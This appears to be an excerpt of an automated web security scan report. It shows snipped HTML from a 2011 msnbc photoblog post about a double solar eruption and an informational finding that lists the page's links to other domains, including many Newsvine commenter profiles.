<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Photoblog - Double whammy
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://photoblog.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/8b751245ebdf90a2a023d6408b7a7907682211f2.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/da88e70e83817a8b3e0c3b7723071d44c87b04c0.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/photoblog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=c5942494&rand=930869644&do=msnbc.redacted&rf=http%3A%2F%2Fphotoblog.msnbc.msn.com%2F_news%2F2011%2F01%2F28%2F5941280-mohamed-bouazizi-the-fruit-vendor-whose-death-may-have-changed-the-arab-world&ad=9:9:80;44::;27:27:108;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://photoblog.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...

<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
</span>A spectacular double eruption on the sun was captured today by NASA's <a target="_blank" href="http://sdo.gsfc.nasa.gov/">Solar Dynamics Observatory</a>. The eruptions happened nearly simultaneously on opposite sides of the solar disk, <a target="_blank" href="http://spaceweather.com/">SpaceWeather.com reported</a>
...[SNIP]...
<p><a target="_blank" href="http://www.byjohnroach.com/"><i>
...[SNIP]...
</i><a target="_blank" href="http://www.facebook.com/cosmiclog"><i>
...[SNIP]...
</i><a href="http://twitter.com/b0yle"><i>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_pictures" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun" data-Text="Double whammy on the sun">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<a href="#star2" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://MikeyMike.newsvine.com/">MikeyMike</a>
...[SNIP]...
<a href="#star3" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://DS-Houston.newsvine.com/">DS in Houston</a>
...[SNIP]...
<a href="#star4" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<a href="#star5" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Ghost2516914.newsvine.com/">Ghost-2516914</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<a href="#star6" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://revlucifer.newsvine.com/">RevLucifer</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<a href="#star7" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Eric2189088.newsvine.com/">Eric-2189088</a>
...[SNIP]...
<div class="normal"><a href="http://revlucifer.newsvine.com/">RevLucifer</a>
...[SNIP]...
<a href="#star8" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://OscarPWalnuts.newsvine.com/">Oscar P Walnuts</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://whyajones.newsvine.com/">Cappy-1911</a>
...[SNIP]...
<div class="normal"><a href="http://jayphly1300264.newsvine.com/">jayphly-1300264</a>
...[SNIP]...
<div class="normal"><a href="http://patrick111.newsvine.com/">Patrick-1112710</a>
...[SNIP]...
<div class="normal"><a href="http://aanhonestsortnhonestsort-1436725.newsvine.com/">anhonestsort-1436725</a>
...[SNIP]...
<div class="normal"><a href="http://PhantomBeast.newsvine.com/">PhantomBeast</a>
...[SNIP]...
<div class="normal"><a href="http://mklavano.newsvine.com/">mklavano</a>
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://Roy-1813861.newsvine.com/">Roy-1813861</a>
...[SNIP]...
<div class="normal"><a href="http://martyofredbay.newsvine.com/">martyofredbay</a>
...[SNIP]...
<a href="#star9" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Nerakluvs.newsvine.com/">Nerakluvs</a>
...[SNIP]...
<div class="normal"><a href="http://phloeman.newsvine.com/">phloeman</a>
...[SNIP]...
<div class="normal"><a href="http://Cabernet2go.newsvine.com/">Ken Johnson-306874</a>
...[SNIP]...
<a href="#star10" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Sonflower.newsvine.com/">Sonflower</a>
...[SNIP]...
<div class="normal"><a href="http://wvbuild.newsvine.com/">wvbuild</a>
...[SNIP]...
<div class="normal"><a href="http://mdb123.newsvine.com/">MDB123</a>
...[SNIP]...
<div class="normal"><a href="http://Pandori.newsvine.com/">Pandori</a>
...[SNIP]...
<div class="normal"><a href="http://Attameus.newsvine.com/">Attameus</a>
...[SNIP]...
<div class="normal"><a href="http://IWonder2997692.newsvine.com/">I Wonder-2997692</a>
...[SNIP]...
<div class="normal"><a href="http://takestwo.newsvine.com/">takes two</a>
...[SNIP]...
<div class="normal"><a href="http://spiddas.newsvine.com/">Spiddas</a>
...[SNIP]...
<div class="normal"><a href="http://TheKhanKubla.newsvine.com/">TheKhanKubla</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="normal"><a href="http://TheKhanKubla.newsvine.com/">TheKhanKubla</a>
...[SNIP]...
<a href="#star11" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://tracer58.newsvine.com/">tracer58</a>
...[SNIP]...
<div class="normal"><a href="http://Tony2997870.newsvine.com/">Tony-2997870</a>
...[SNIP]...
<div class="normal"><a href="http://Tony2997870.newsvine.com/">Tony-2997870</a>
...[SNIP]...
<div class="normal"><a href="http://DumbJock.newsvine.com/">Dumb Jock</a>
...[SNIP]...
<div class="normal"><a href="http://hal90004.newsvine.com/">~HAL9000~</a>
...[SNIP]...
<div class="normal"><a href="http://TAMUK.newsvine.com/">TAMUK</a>
...[SNIP]...
<div class="normal"><a href="http://larbell.newsvine.com/">larbell</a>
...[SNIP]...
<div class="normal"><a href="http://paulhardy.newsvine.com/">orbust</a>
...[SNIP]...
<div class="normal"><a href="http://2srvHM.newsvine.com/">2srvHM</a>
...[SNIP]...
<div class="normal"><a href="http://fdpfg.newsvine.com/">fdpfg</a>
...[SNIP]...
<div class="normal"><a href="http://wire-bender.newsvine.com/">1NewDay</a>
...[SNIP]...
<div class="normal"><a href="http://wire-bender.newsvine.com/">1NewDay</a>
...[SNIP]...
<div class="normal"><a href="http://phloeman.newsvine.com/">phloeman</a>
...[SNIP]...
<div class="normal"><a href="http://mossdog420m.newsvine.com/">Megalodon-358694</a>
...[SNIP]...
<p><a href="http://attameus.newsvine.com/">Attameus</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://twyla-moon.newsvine.com/">Twyla Moon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://UnregisteredUser.newsvine.com/">Unregistered User</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://polanofp.newsvine.com/">An American!</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://phillyc1.newsvine.com/">PhillyC</a>
...[SNIP]...
<div class="normal"><a href="http://elven-bookworm.newsvine.com/">Elven Bookworm</a>
...[SNIP]...
<div class="normal"><a href="http://a--smith-1451820.newsvine.com/">A. Smith-1451820</a>
...[SNIP]...
<a href="#star12" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://MC2075922.newsvine.com/">MC-2075922</a>
...[SNIP]...
<a href="#star13" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="normal"><a href="http://Phoehammer.newsvine.com/">Phoehammer</a>
...[SNIP]...
<div class="normal"><a href="http://BillyBill.newsvine.com/">BillyBill</a>
...[SNIP]...
<div class="normal"><a href="http://scott-mckinsey.newsvine.com/">Mbones</a>
...[SNIP]...
<div class="normal"><a href="http://edwardduffy.newsvine.com/">Edward Duffy</a>
...[SNIP]...
<div class="normal"><a href="http://DaveO2998087.newsvine.com/">Dave-O-2998087</a>
...[SNIP]...
<div class="normal"><a href="http://danwill2.newsvine.com/">danwill</a>
...[SNIP]...
<div class="normal"><a href="http://Weralldoomed.newsvine.com/">Weralldoomed</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://robw1001.newsvine.com/">Robert Fleming</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://jpfs52.newsvine.com/">jpfs52</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ilovecanoes.newsvine.com/">Chris-1664618</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://twyla-moon.newsvine.com/">Twyla Moon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://senigallia.newsvine.com/">senigallia</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="normal"><a href="http://garrettb1.newsvine.com/">GarrettB</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://jwp6868.newsvine.com/">Joe in NC</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://a--smith-1451820.newsvine.com/">A. Smith-1451820</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://halowain.newsvine.com/">Hal Sherman</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="normal"><a href="http://mar2892158.newsvine.com/">mar-2892158</a>
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="normal"><a href="http://davidf3.newsvine.com/">DavidF</a>
...[SNIP]...
<div class="normal"><a href="http://takestwo.newsvine.com/">takes two</a>
...[SNIP]...
<div class="normal"><a href="http://jbunn.newsvine.com/">jbunn</a>
...[SNIP]...
<div class="normal"><a href="http://danwill2.newsvine.com/">danwill</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://mnstrm2.newsvine.com/">Art-981203</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ffeineandsugar.newsvine.com/">ffeineandsugar</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://sbphrog.newsvine.com/">SBPhrog</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://chibnikh.newsvine.com/">Herman C</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://steveorevo.newsvine.com/">S-480203</a>
...[SNIP]...
<div class="normal"><a href="http://Isthishumanity.newsvine.com/">Is this humanity</a>
...[SNIP]...
<div class="normal"><a href="http://snrekkcaj.newsvine.com/">Dissociate</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://rwh0829.newsvine.com/">riscifiguy</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://MikeObama2313287.newsvine.com/">Mike Obama-2313287</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://votelover.newsvine.com/">votelover</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://raysmith.newsvine.com/">ray smith</a>
...[SNIP]...
<div class="normal"><a href="http://Fritz2712801.newsvine.com/">Fritz-2712801</a>
...[SNIP]...
<div class="normal"><a href="http://countrygirl78.newsvine.com/">countrygirl78</a>
...[SNIP]...
<div class="normal"><a href="http://mar2892158.newsvine.com/">mar-2892158</a>
...[SNIP]...
<div class="normal"><a href="http://uradouch.newsvine.com/">uradouch</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://raysmith.newsvine.com/">ray smith</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://raysmith.newsvine.com/">ray smith</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Brilli99.newsvine.com/">Brilli-99</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mklavano.newsvine.com/">mklavano</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://glenbo02.newsvine.com/">glenbo</a>
...[SNIP]...
<div class="normal"><a href="http://josh1791701.newsvine.com/">Josh-1791701</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://RevitRay.newsvine.com/">Revit Ray</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://martyofredbay.newsvine.com/">martyofredbay</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mpp2029706.newsvine.com/">mpp-2029706</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Fritz2712801.newsvine.com/">Fritz-2712801</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://catastrophe3.newsvine.com/">cat(astrophe)</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star14" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://markscastle.newsvine.com/">MC-784701</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://DaughterofDaedalus.newsvine.com/">Daughter of Daedalus</a>
...[SNIP]...
<div class="normal"><a href="http://davidf3.newsvine.com/">DavidF</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://john-roach.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/jtroach-2120073942.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.249. http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://photoblog.msnbc.redacted
Path:	/_news/2011/01/28/5942494-double-whammy-on-the-sun

Issue detail

The page was loaded from a URL containing a query string:

http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun?gt1=43001

The response contains the following links to other domains:

http://2srvhm.newsvine.com/
http://a--smith-1451820.newsvine.com/
http://aanhonestsortnhonestsort-1436725.newsvine.com/
http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://attameus.newsvine.com/
http://billybill.newsvine.com/
http://brilli99.newsvine.com/
http://cabernet2go.newsvine.com/
http://catastrophe3.newsvine.com/
http://chibnikh.newsvine.com/
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://countrygirl78.newsvine.com/
http://danwill2.newsvine.com/
http://dateline.msnbc.com/
http://daughterofdaedalus.newsvine.com/
http://daveo2998087.newsvine.com/
http://davidf3.newsvine.com/
http://ds-houston.newsvine.com/
http://dumbjock.newsvine.com/
http://edwardduffy.newsvine.com/
http://elven-bookworm.newsvine.com/
http://eric2189088.newsvine.com/
http://fdpfg.newsvine.com/
http://ffeineandsugar.newsvine.com/
http://fritz2712801.newsvine.com/
http://ghost2516914.newsvine.com/
http://glenbo02.newsvine.com/
